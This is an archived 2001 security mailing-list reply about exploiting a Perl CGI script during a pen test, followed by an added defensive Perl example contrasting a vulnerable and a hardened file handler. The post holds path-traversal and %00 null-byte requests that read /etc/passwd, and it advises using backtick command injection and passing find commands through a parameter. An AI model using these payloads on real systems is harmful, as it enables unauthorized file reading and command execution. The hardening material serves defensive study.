Re: vulnerable perl script?

From: Jay D. Dyson (jdysonat_private)
Date: Thu Oct 18 2001 - 11:22:17 PDT


    On Thu, 18 Oct 2001 otanerat_private wrote:
    
    > I'm doing a pen test and I found a perl script, which seems to be
    > vulnerable. If I do a get, for example: 
    > 
    > GET
    > /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../etc/passwd%00
    > 
    > I can see the content of the passwd file. But when I try to execute a
    > command, for example:
    > 
    > GET
    > /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../bin/id%00
    > 
    > I get this garbage and some interesting stuff:
    
    	It's not executing the command; the binary itself is being dumped
    (just like if you did a 'cat /bin/id' on the command line).
    
    	Try encapsulating the last part as `/bin/id`.  That should get you
    the desired results. 
    
    > I'm not sure but I think, the %00 is the problem and without %00, I get
    > no results. Does anybody know how I can execute my commands? I tried ;
    > and ¦, but nothing happened. I'm not able to see the source of the perl
    > file. 
    
    	To see the contents of the Perl file, try something like:
    
    	/cgi-bin/whatever.pl?variable1=test%00&variable2=./whatever.pl%00
    
    	If that doesn't work, try standard Apache locations like:
    
    	/var/lib/apache/cgi-bin/whatever.pl
    	/usr/local/apache/cgi-bin/whatever.pl
    	/usr/local/bin/apache/cgi-bin/whatever.pl
    
    	...and so on.  If none of that pans out, just try passing a find
    or locate command through variable2.  You're bound to hit paydirt
    thataway.
    
    - -Jay
    
      (    (                                                         _______
      ))   ))   .-"There's always time for a good cup of coffee."-.   >====<--.
    C|~~|C|~~| (>------ Jay D. Dyson - jdysonat_private ------<) |    = |-'
     `--' `--'  `- Peace without justice is life without living. -'  `------'
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/
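The behaviour the thread exercises (a decoded %00 ending the path early, so the script reads a file well outside its intended directory) comes from a Perl CGI handing the untrusted query value to a two-argument open(). As an added example that is not part of the original post or of the script under discussion, here is a handler written in that style beside a hardened version; the directory, function names and sample inputs are assumptions.

```perl
#!/usr/bin/perl
# Added example, not code from the thread. The served directory and the
# function names are assumed for illustration.
use strict;
use warnings;
use File::Spec;

my $DOC_ROOT = '/var/www/docs';   # assumed directory the script is meant to serve

# Vulnerable: two-argument open() passes the untrusted name straight down to
# the C-level open(2), which treats a NUL byte (what %00 decodes to) as the end
# of the path. "../../../../etc/passwd\0" therefore opens /etc/passwd, and
# two-argument open() also interprets a leading or trailing '|' as a pipe to a
# command, which is why perlfunc recommends the three-argument form.
sub read_doc_vulnerable {
    my ($name) = @_;
    open(my $fh, "$DOC_ROOT/$name") or return undef;
    local $/;
    return <$fh>;
}

# Hardened: accept only a single plain file-name component (no NUL, no '/',
# no shell metacharacters), use three-argument open() so the value can never
# select a pipe, and require that the result is a regular file under DOC_ROOT.
sub read_doc_hardened {
    my ($name) = @_;
    return undef unless defined $name
        && $name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/;
    my $path = File::Spec->catfile($DOC_ROOT, $name);
    return undef unless -f $path;
    open(my $fh, '<', $path) or return undef;
    local $/;
    return <$fh>;
}

# Constructed inputs in the shape the thread shows, after URL decoding.
for my $input ("report.txt", "../../../../../../etc/passwd\0", "/bin/id|") {
    my $verdict = defined read_doc_hardened($input) ? 'served' : 'refused';
    printf "%-36s -> %s\n", ($input =~ s/\0/\\0/gr), $verdict;
}
```

Only the first input can ever reach open() in the hardened version; the other two are refused by the allow-list before any filesystem call is made, and a web server log entry whose query string contains %00 or ../ is a cheap signal to alert on.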
    



    This archive was generated by hypermail 2b30 : Thu Oct 18 2001 - 12:53:27 PDT